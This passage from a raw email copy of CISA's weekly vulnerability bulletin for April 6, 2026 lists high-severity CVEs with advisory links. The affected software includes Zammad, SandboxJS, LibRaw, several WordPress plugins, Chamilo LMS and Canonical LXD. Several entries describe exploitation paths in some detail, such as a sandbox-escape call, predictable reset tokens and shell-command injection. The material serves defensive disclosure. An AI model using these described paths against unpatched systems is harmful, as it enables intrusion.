=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1, a server-side template injection vulnerabili=
ty which leads to RCE via AI Agent exists. Impact is limited to environment=
s where an attacker can control or influence type_enrichment_data (typicall=
y high-privilege administrative configuration). This vulnerability is fixed=
in 7.0.1. 2026-04-08 not yet calculated CVE-2026-34724 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-34724 ] https://github.com/zammad/zammad/securit= y/advisories/GHSA-fg9w-jg8f-4j94
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, the REST endpoint POST /api/v1/ai_= assistance/text_tools/:id was not checking if a user is privileged to use t=
he text tool, resulting in being able to use it in all situations. This vul= nerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2= 026-34782 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34782 ] https://git= hub.com/zammad/zammad/security/advisories/GHSA-96r7-29c8-2j7q
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1, he REST endpoint POST /api/v1/ai_assistance/= text_tools/:id contains an authorization failure. Context data (e.g., a gro=
up or organization) supplied to be used in the AI prompt were not checked i=
f they are accessible for the current user. This leads to having data prese=
nt in the AI prompt that were not authorized before being used. A user need=
s to have ticket.agent permission to be able to use the provided context da= ta. This vulnerability is fixed in 7.0.1. 2026-04-08 not yet calculated CVE= -2026-34837 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34837 ] https://g= ithub.com/zammad/zammad/security/advisories/GHSA-89vv-6639-wcv8
=C2=A0=20

Back to top [ #top ]

n/a

body { font-size: 1em; font-family: Arial, Verdana, sans-serif; font-weight=
: normal; font-style: normal; color: #333333; }=20

Having trouble viewing this message?=C2=A0View it as a webpage [ https://co= ntent.govdelivery.com/accounts/USDHSCISA/bulletins/412cde5 ].=C2=A0 [ https= ://content.govdelivery.com/accounts/USDHS/bulletins/292141e ]

You are subscribed to updates from the Cybersecurity and Infrastructure Sec= urity Agency [ https://www.cisa.gov ] (CISA)
Manage Subscriptions [ https://public.govdelivery.com/accounts/USDHSCISA/su= bscriber/edit?preferences=3Dtrue#tab1 ]=C2=A0=C2=A0|=C2=A0=C2=A0Privacy Pol= icy [ https://www.cisa.gov/privacy-policy ]=C2=A0=C2=A0|=C2=A0 Help [ https= ://subscriberhelp.granicus.com/s/article/Subscriber-Help-Center ] [ https:/= /insights.govdelivery.com/Communications/Subscriber_Help_Center ]

Connect with CISA:=20
Facebook [ https://www.facebook.com/CISA ]=C2=A0 |=C2=A0 Twitter [ https://= twitter.com/CISAgov ]=C2=A0 |=C2=A0 Instagram [ https://Instagram.com/cisag=
ov ]=C2=A0 |=C2=A0 LinkedIn [ https://www.linkedin.com/company/cybersecurit= y-and-infrastructure-security-agency ]=C2=A0 |=C2=A0=C2=A0 YouTube [ https:= //www.youtube.com/channel/UCxyq9roe-npgzrVwbpoAy0A ]

________________________________________________________________________

This email was sent to cisa@toolazy.synchro.net using GovDelivery Communica= tions Cloud, on behalf of: Cybersecurity and Infrastructure Security Agency=
=C2=B7 707 17th St, Suite 4000 =C2=B7 Denver, CO 80202 GovDelivery logo [ = https://subscriberhelp.granicus.com/ ]=20
body .abe-column-block { min-height: 5px; } table.gd_combo_table img {margi= n-left:10px; margin-right:10px;} table.gd_combo_table div.govd_image_displa=
y img, table.gd_combo_table td.gd_combo_image_cell img {margin-left:0px; ma= rgin-right:0px;}

--===============2735279975235001205==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=3D"http://www.w3.org/1999/xhtml" xml:lang=3D"en" lang=3D"en"> <head>
<title> Vulnerability Summary for the Week of April 6, 2026
</title>


</head>
<body style=3D"">

<table width=3D"700" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"=
align=3D"center">
<tr>
<td>

<!--[if (gte mso 9)|(IE)]>
<table style=3D"display:none"><tr><td><a name=3D"gd_top" id=3D"gd_top"></= a></td></tr></table>
<![endif]-->
<a name=3D"gd_top" id=3D"gd_top"></a>

=20



<p><img src=3D"https://content.govdelivery.com/attachments/fancy_images/U= SDHSCISA/2020/06/3486054/05152023-gov-delivery-banner-copy_original.png" al= t=3D"Cybersecurity and Infrastructure Security Agency (CISA)" title=3D"" wi= dth=3D"600" height=3D"100"></p>
<p>You are subscribed to Vulnerability Bulletins for Cybersecurity and In= frastructure Security Agency. This information has recently been updated an=
d is now available.</p>
<p>The CISA Vulnerability Bulletin provides a summary of new vulnerabilitie=
s that have been recorded in the past week. In some cases, the vulnerabilit= ies in the bulletin may not yet have assigned CVSS scores.</p> <p>Vulnerabilities are based on the=C2=A0<a href=3D"https://www.cve.org/" t= arget=3D"_blank" class=3D"ext" data-extlink=3D"" rel=3D"noopener">Common Vu= lnerabilities and Exposures</a>=C2=A0(CVE) vulnerability naming standard an=
d are organized according to severity, determined by the=C2=A0<a href=3D"ht= tps://www.cve.org/about/relatedefforts" target=3D"_blank" rel=3D"noopener">= Common Vulnerability Scoring System</a>=C2=A0(CVSS) standard. The division =
of high, medium, and low severities correspond to the following scores:</p>


<strong>High</strong>: vulnerabilities with a CVSS base score of 7.0=E2=80= =9310.0</li>

<strong>Medium</strong>: vulnerabilities with a CVSS base score of 4.0=E2= =80=936.9</li>

<strong>Low</strong>: vulnerabilities with a CVSS base score of 0.0=E2=80= =933.9</li>
</ul>
<p>Entries may include additional information provided by organizations and=
efforts sponsored by CISA. This information may include identifying inform= ation, values, definitions, and related links. Patch information is provide=
d when available. Please note that some of the information in the bulletin =
is compiled from external, open-source reports and is not a direct result o=
f CISA analysis.</p>
<div class=3D"rss_item" style=3D"margin-bottom: 2em;">
<div class=3D"rss_title" style=3D"font-weight: bold; font-size: 120%; margi=
n: 0 0 0.3em; padding: 0;"><a href=3D"https://www.cisa.gov/news-events/bull= etins/sb26-103" target=3D"_blank" title=3D"Vulnerability Summary for the We=
ek of April 6, 2026" rel=3D"noopener">Vulnerability Summary for the Week of=
April 6, 2026</a></div>
<div class=3D"rss_pub_date" style=3D"font-size: 90%; font-style: italic; co= lor: #666666; margin: 0 0 0.3em; padding: 0;">04/14/2026 08:00 AM EDT</div> <div class=3D"rss_description" style=3D"margin: 0 0 0.3em; padding: 0;">
<div id=3D"high_v">
<h2 id=3D"high_v_title">High Vulnerabilities</h2>
<table class=3D"table no-tablesaw" style=3D"table-layout: fixed; width: 100= %;" border=3D"1" summary=3D"High Vulnerabilities" align=3D"center">
<thead>

<th class=3D"vendor-product" style=3D"width: 24%;" scope=3D"col">
<span class=3D"primary-vendor">Primary</span><br><span class=3D"primary-ven= dor">Vendor</span> -- Product</th>
<th style=3D"width: 44%;" scope=3D"col">Description</th>
<th style=3D"width: 10%;" scope=3D"col">Published</th>
<th style=3D"width: 8%;" scope=3D"col">CVSS Score</th>
<th style=3D"width: 7%;" scope=3D"col">Source Info</th>
<th style=3D"width: 7%;" scope=3D"col">Patch Info</th>
</tr>
</thead>
<tbody>

<td class=3D"vendor-product">nyariv--SandboxJS</td>
<td>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJ=
S blocks direct assignment to global objects (for example Math.random =3D .= ..), but this protection can be bypassed through an exposed callable constr= uctor path: this.constructor.call(target, attackerObject). Because this.con= structor resolves to the internal SandboxGlobal function and Function.proto= type.call is allowed, attacker code can write arbitrary properties into hos=
t global objects and persist those mutations across sandbox instances in th=
e same process. This vulnerability is fixed in 0.8.36.</td>
<td>2026-04-06</td>
<td>10</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34208" target=3D= "_blank" rel=3D"noopener">CVE-2026-34208</a></td>

<a href=3D"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg= 9-6p7w-6cpj" target=3D"_blank" rel=3D"noopener">https://github.com/nyariv/S= andboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Davidtavarez--CF Image Hosting Script</td>
<td>CF Image Hosting Script 1.6.5 allows unauthenticated attackers to downl= oad and decode the application database by accessing the imgdb.db file in t=
he upload/data directory. Attackers can extract delete IDs stored in plaint= ext from the deserialized database and use them to delete all pictures via = the d parameter.</td>
<td>2026-04-12</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25709" target=3D= "_blank" rel=3D"noopener">CVE-2019-25709</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46094" target=3D"_blank" rel= =3D"noopener">ExploitDB-46094</a><br><a href=3D"https://davidtavarez.github= .io/" target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><=
a href=3D"http://forum.codefuture.co.uk/showthread.php?tid=3D73141" target= =3D"_blank" rel=3D"noopener">Product Reference</a><br><a href=3D"https://ww= w.vulncheck.com/advisories/cf-image-hosting-script-unauthorized-database-ac= cess" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory: CF Image Hosti=
ng Script 1.6.5 Unauthorized Database Access</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Beijing Topsec Network Security Technology Co.=
, Ltd.--Tianxin Internet Behavior Management System</td>
<td>Tianxin Internet Behavior Management System contains a command injectio=
n vulnerability in the Reporter component endpoint that allows unauthentica= ted attackers to execute arbitrary commands by supplying a crafted objClass=
parameter containing shell metacharacters and output redirection. Attacker=
s can exploit this vulnerability to write malicious PHP files into the web = root and achieve remote code execution with the privileges of the web serve=
r process. This vulnerability has been fixed in version NACFirmware_4.0.0.7= _20210716.180815_topsec_0_basic.bin. Exploitation evidence was first observ=
ed by the Shadowserver Foundation on 2024-06-01 (UTC).</td>
<td>2026-04-07</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2021-4473" target=3D"= _blank" rel=3D"noopener">CVE-2021-4473</a></td>

<a href=3D"https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972" target=3D"_bl= ank" rel=3D"noopener">https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972</a>= <br><a href=3D"https://www.cnvd.org.cn/patchInfo/show/280166" target=3D"_bl= ank" rel=3D"noopener">https://www.cnvd.org.cn/patchInfo/show/280166</a><br>=
<a href=3D"https://cn-sec.com/archives/4631959.html" target=3D"_blank" rel= =3D"noopener">https://cn-sec.com/archives/4631959.html</a><br><a href=3D"ht= tps://avd.aliyun.com/detail?id=3DAVD-2021-890232" target=3D"_blank" rel=3D"= noopener">https://avd.aliyun.com/detail?id=3DAVD-2021-890232</a><br><a href= =3D"https://www.vulncheck.com/advisories/tianxin-internet-behavior-manageme= nt-system-command-injection-via-toquery-php" target=3D"_blank" rel=3D"noope= ner">https://www.vulncheck.com/advisories/tianxin-internet-behavior-managem= ent-system-command-injection-via-toquery-php</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Contemporary Controls--BASControl20</td>
<td>An attacker could use data obtained by sniffing the network traffic to = forge packets in order to make arbitrary requests to Contemporary Controls = BASC 20T.</td>
<td>2026-04-09</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-13926" target=3D= "_blank" rel=3D"noopener">CVE-2025-13926</a></td>

<a href=3D"https://www.ccontrols.com/support/contacttech.htm" target=3D"_bl= ank" rel=3D"noopener">https://www.ccontrols.com/support/contacttech.htm</a>= <br><a href=3D"https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-= 01" target=3D"_blank" rel=3D"noopener">https://www.cisa.gov/news-events/ics= -advisories/icsa-26-099-01</a><br><a href=3D"https://github.com/cisagov/CSA= F/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json" target=3D"_bla= nk" rel=3D"noopener">https://github.com/cisagov/CSAF/blob/develop/csaf_file= s/OT/white/2026/icsa-26-099-01.json</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">SaturdayDrive--Ninja Forms - File Uploads</td> <td>The Ninja Forms - File Uploads plugin for WordPress is vulnerable to ar= bitrary file uploads due to missing file type validation in the 'NF_FU_AJAX= _Controllers_Uploads::handle_upload' function in all versions up to, and in= cluding, 3.3.26. This makes it possible for unauthenticated attackers to up= load arbitrary files on the affected site's server which may make remote co=
de execution possible. Note: The vulnerability was partially patched in ver= sion 3.3.25 and fully patched in version 3.3.27.</td>
<td>2026-04-07</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-0740" target=3D"= _blank" rel=3D"noopener">CVE-2026-0740</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606d= ed-ab50-486a-9337-97ee9f452f12?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab5= 0-486a-9337-97ee9f452f12?source=3Dcve</a><br><a href=3D"https://ninjaforms.= com/extensions/file-uploads/" target=3D"_blank" rel=3D"noopener">https://ni= njaforms.com/extensions/file-uploads/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">IBM--Verify Identity Access Container</td>
<td>IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Securi=
ty Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Ac= cess 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9=
.1 could allow a locally authenticated user to escalate their privileges to=
root due to execution with unnecessary privileges than required.</td> <td>2026-04-08</td>
<td>9.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1346" target=3D"= _blank" rel=3D"noopener">CVE-2026-1346</a></td>

<a href=3D"https://www.ibm.com/support/pages/node/7268253" target=3D"_blank=
" rel=3D"noopener">https://www.ibm.com/support/pages/node/7268253</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">davidfcarr--Quick Playground</td>
<td>The Quick Playground plugin for WordPress is vulnerable to Remote Code = Execution in all versions up to, and including, 1.3.1. This is due to insuf= ficient authorization checks on REST API endpoints that expose a sync code = and allow arbitrary file uploads. This makes it possible for unauthenticate=
d attackers to retrieve the sync code, upload PHP files with path traversal=
, and achieve remote code execution on the server.</td>
<td>2026-04-09</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1830" target=3D"= _blank" rel=3D"noopener">CVE-2026-1830</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd2= 8a-a477-4bc6-a392-ad5a9eca1cb5?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a47= 7-4bc6-a392-ad5a9eca1cb5?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/quick-playground/trunk/api.php#L39" target=3D"_blan=
k" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/quick-playgr= ound/trunk/api.php#L39</a><br><a href=3D"https://plugins.trac.wordpress.org= /browser/quick-playground/trunk/expro-api.php#L419" target=3D"_blank" rel= =3D"noopener">https://plugins.trac.wordpress.org/browser/quick-playground/t= runk/expro-api.php#L419</a><br><a href=3D"https://plugins.trac.wordpress.or= g/changeset?sfp_email=3D&sfph_mail=3D&reponame=3D&old=3D3500839%40quick-pla= yground&new=3D3500839%40quick-playground&sfp_email=3D&sfph_mail=3D" target= =3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset?s= fp_email=3D&sfph_mail=3D&reponame=3D&old=3D3500839%40quick-playground&new= =3D3500839%40quick-playground&sfp_email=3D&sfph_mail</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">LibRaw--LibRaw</td>
<td>A heap-based buffer overflow vulnerability exists in the x3f_thumb_load=
er functionality of LibRaw Commit d20315b. A specially crafted malicious fi=
le can lead to a heap buffer overflow. An attacker can provide a malicious = file to trigger this vulnerability.</td>
<td>2026-04-07</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20889" target=3D= "_blank" rel=3D"noopener">CVE-2026-20889</a></td>

<a href=3D"https://talosintelligence.com/vulnerability_reports/TALOS-2026-2= 358" target=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulne= rability_reports/TALOS-2026-2358</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">LibRaw--LibRaw</td>
<td>A heap-based buffer overflow vulnerability exists in the HuffTable::ini= tval functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially=
crafted malicious file can lead to a heap buffer overflow. An attacker can=
provide a malicious file to trigger this vulnerability.</td> <td>2026-04-07</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20911" target=3D= "_blank" rel=3D"noopener">CVE-2026-20911</a></td>

<a href=3D"https://talosintelligence.com/vulnerability_reports/TALOS-2026-2= 330" target=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulne= rability_reports/TALOS-2026-2330</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">LibRaw--LibRaw</td>
<td>A heap-based buffer overflow vulnerability exists in the lossless_jpeg_= load_raw functionality of LibRaw Commit 0b56545 and Commit d20315b. A speci= ally crafted malicious file can lead to a heap buffer overflow. An attacker=
can provide a malicious file to trigger this vulnerability.</td> <td>2026-04-07</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21413" target=3D= "_blank" rel=3D"noopener">CVE-2026-21413</a></td>

<a href=3D"https://talosintelligence.com/vulnerability_reports/TALOS-2026-2= 331" target=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulne= rability_reports/TALOS-2026-2331</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Weaver Network Co., Ltd.--E-cology</td>
<td>Weaver (Fanwei) E-cology 10.0 versions prior to=C2=A020260312 contain a=
n unauthenticated remote code execution vulnerability in the /papi/esearch/= data/devops/dubboApi/debug/method endpoint that allows attackers to execute=
arbitrary commands by invoking exposed debug functionality. Attackers can = craft POST requests with attacker-controlled interfaceName and methodName p= arameters to reach command-execution helpers and achieve arbitrary command = execution on the system.=C2=A0Exploitation evidence was first observed by t=
he Shadowserver Foundation on 2026-03-31 (UTC).</td>
<td>2026-04-07</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22679" target=3D= "_blank" rel=3D"noopener">CVE-2026-22679</a></td>

<a href=3D"https://www.weaver.com.cn/cs/securityDownload.html#" target=3D"_= blank" rel=3D"noopener">https://www.weaver.com.cn/cs/securityDownload.html#= </a><br><a href=3D"https://h4cker.zip/post/d5d211/" target=3D"_blank" rel= =3D"noopener">https://h4cker.zip/post/d5d211/</a><br><a href=3D"https://ti.= qianxin.com/vulnerability/notice-detail/1760" target=3D"_blank" rel=3D"noop= ener">https://ti.qianxin.com/vulnerability/notice-detail/1760</a><br><a hre= f=3D"https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-r= ce-via-dubboapi-debug-endpoint" target=3D"_blank" rel=3D"noopener">https://= www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboa= pi-debug-endpoint</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">prosolution--ProSolution WP Client</td>
<td>The ProSolution WP Client plugin for WordPress is vulnerable to arbitra=
ry file uploads due to missing file type validation in the 'proSol_fileUplo= adProcess' function in all versions up to, and including, 1.9.9. This makes=
it possible for unauthenticated attackers to upload arbitrary files on the=
affected site's server which may make remote code execution possible.</td> <td>2026-04-08</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2942" target=3D"= _blank" rel=3D"noopener">CVE-2026-2942</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/3852ae= f6-42e7-4b71-a1ba-dd41284fd07b?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/3852aef6-42e= 7-4b71-a1ba-dd41284fd07b?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/prosolution-wp-client/trunk/public/class-prosolwpcl= ient-public.php?rev=3D3331282#L993" target=3D"_blank" rel=3D"noopener">http= s://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/public/c= lass-prosolwpclient-public.php?rev=3D3331282#L993</a><br><a href=3D"https:/= /plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client" target= =3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset/3= 484577/prosolution-wp-client</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Rukovoditel--Rukovoditel CRM</td>
<td>A reflected cross-site scripting (XSS) vulnerability exists in Rukovodi= tel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/a= pi/tel/zadarma.php). The application directly reflects user-supplied input = from the 'zd_echo' GET parameter into the HTTP response without proper sani= tization, output encoding, or content-type restrictions. The vulnerable cod=
e is: if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']); An unauthenticat=
ed attacker can exploit this issue by crafting a malicious URL containing J= avaScript payloads. When a victim visits the link, the payload executes in = the context of the application within the victim's browser, potentially lea= ding to session hijacking, credential theft, phishing, or account takeover.=
The issue is fixed in version 3.7, which introduces proper input validatio=
n and output encoding to prevent script injection.</td>
<td>2026-04-11</td>
<td>9.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31845" target=3D= "_blank" rel=3D"noopener">CVE-2026-31845</a></td>

<a href=3D"https://forum.rukovoditel.net/viewtopic.php?p=3D22499#p22499" ta= rget=3D"_blank" rel=3D"noopener">https://forum.rukovoditel.net/viewtopic.ph= p?p=3D22499#p22499</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the fi=
le move function. The move() function in fileManage.lib.php passes user-con= trolled path values directly into exec() shell commands without using escap= eshellarg(). When a user moves a document via document.php, the move_to POS=
T parameter - which only passes through Security::remove_XSS() (an HTML-onl=
y filter) - is concatenated directly into shell commands such as exec("mv $= source $target"). By default, Chamilo allows all authenticated users to cre= ate courses (allow_users_to_create_courses =3D true). Any user who is a tea= cher in a course (including self-created courses) can move documents, makin=
g this vulnerability exploitable by any authenticated user. The attacker mu=
st first place a directory with shell metacharacters in its name on the fil= esystem (achievable via Course Backup Import), then move a document into th=
at directory to trigger arbitrary command execution as the web server user = (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td> <td>2026-04-10</td>
<td>9.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32892" target=3D= "_blank" rel=3D"noopener">CVE-2026-32892</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 59cv-qh65-vvrr" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bb= fe71714bf" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee= 90f35c234df1" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">wpeverest--Everest Forms Contact Form, Payment=
Form, Quiz, Survey &amp; Custom Form Builder</td>
<td>The Everest Forms plugin for WordPress is vulnerable to PHP Object Inje= ction in all versions up to, and including, 3.4.3 via deserialization of un= trusted input from form entry metadata. This is due to the html-admin-page-= entries-view.php file calling PHP's native unserialize() on stored entry me=
ta values without passing the allowed_classes parameter. This makes it poss= ible for unauthenticated attackers to inject a serialized PHP object payloa=
d through any public Everest Forms form field. The payload survives sanitiz= e_text_field() sanitization (serialization control characters are not strip= ped) and is stored in the wp_evf_entrymeta database table. When an administ= rator views entries or views an individual entry, the unsafe unserialize() = call processes the stored data without class restrictions.</td> <td>2026-04-08</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3296" target=3D"= _blank" rel=3D"noopener">CVE-2026-3296</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae= 37-790d-4b18-a9ec-054c8c27b8bc?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-790= d-4b18-a9ec-054c8c27b8bc?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admin/views/html-= admin-page-entries-view.php#L133" target=3D"_blank" rel=3D"noopener">https:= //plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admi= n/views/html-admin-page-entries-view.php#L133</a><br><a href=3D"https://plu= gins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/views/ht= ml-admin-page-entries-view.php#L133" target=3D"_blank" rel=3D"noopener">htt= ps://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/= views/html-admin-page-entries-view.php#L133</a><br><a href=3D"https://plugi= ns.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-fu= nctions.php#L5594" target=3D"_blank" rel=3D"noopener">https://plugins.trac.= wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-functions.= php#L5594</a><br><a href=3D"https://plugins.trac.wordpress.org/changeset/34= 89938/everest-forms/tags/3.4.4/readme.txt?old=3D3464753&old_path=3Deverest-= forms%2Ftags%2F3.4.3%2Freadme.txt" target=3D"_blank" rel=3D"noopener">https= ://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4.4/re= adme.txt?old=3D3464753&old_path=3Deverest-forms%2Ftags%2F3.4.3%2Freadme.txt= </a><br><a href=3D"https://plugins.trac.wordpress.org/changeset?old_path=3D= /everest-forms/tags/3.4.3&new_path=3D/everest-forms/tags/3.4.4" target=3D"_= blank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset?old_pa= th=3D/everest-forms/tags/3.4.3&new_path=3D/everest-forms/tags/3.4.4</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, the default password reset mechanism generates tokens using sha1($em= ail) with no random component, no expiration, and no rate limiting. An atta= cker who knows a user's email can compute the reset token and change the vi= ctim's password without authentication. This vulnerability is fixed in 1.11= .38 and 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>9.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33707" target=3D= "_blank" rel=3D"noopener">CVE-2026-33707</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= f27g-66gq-g7v2" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc6= 83db0bda8" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d95= 9ca40be4a18c" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">Juniper Networks--JSI LWC</td>
<td>A Use of Default Password vulnerability in the Juniper Networks Support=
Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthentica= ted, network-based attacker to take full control of the device. vLWC softwa=
re images ship with an initial password for a high privileged account. A ch= ange of this password is not enforced during the provisioning of the softwa= re, which can make full access to the system by unauthorized actors possibl= e.This issue affects all versions of vLWC before 3.0.94.</td> <td>2026-04-09</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33784" target=3D= "_blank" rel=3D"noopener">CVE-2026-33784</a></td>

<a href=3D"https://kb.juniper.net/JSA107871" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107871</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Canonical--lxd</td>
<td>Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist =
in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which o= mits raw.apparmor and raw.qemu.conf from the set of keys blocked under the = restricted.virtual-machines.lowlevel=3Dblock project restriction. A remote = attacker with can_edit permission on a VM instance in a restricted project = can inject an AppArmor rule and a QEMU chardev configuration that bridges t=
he LXD Unix socket into the guest VM, enabling privilege escalation to LXD = cluster administrator and subsequently to host root.</td>
<td>2026-04-09</td>
<td>9.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34177" target=3D= "_blank" rel=3D"noopener">CVE-2026-34177</a></td>

<a href=3D"https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c= 5qw-4h6f" target=3D"_blank" rel=3D"noopener">VM lowlevel restriction bypass=
via raw.apparmor and raw.qemu.conf</a><br><a href=3D"https://github.com/ca= nonical/lxd/pull/17909" target=3D"_blank" rel=3D"noopener">lxd: Prevent use=
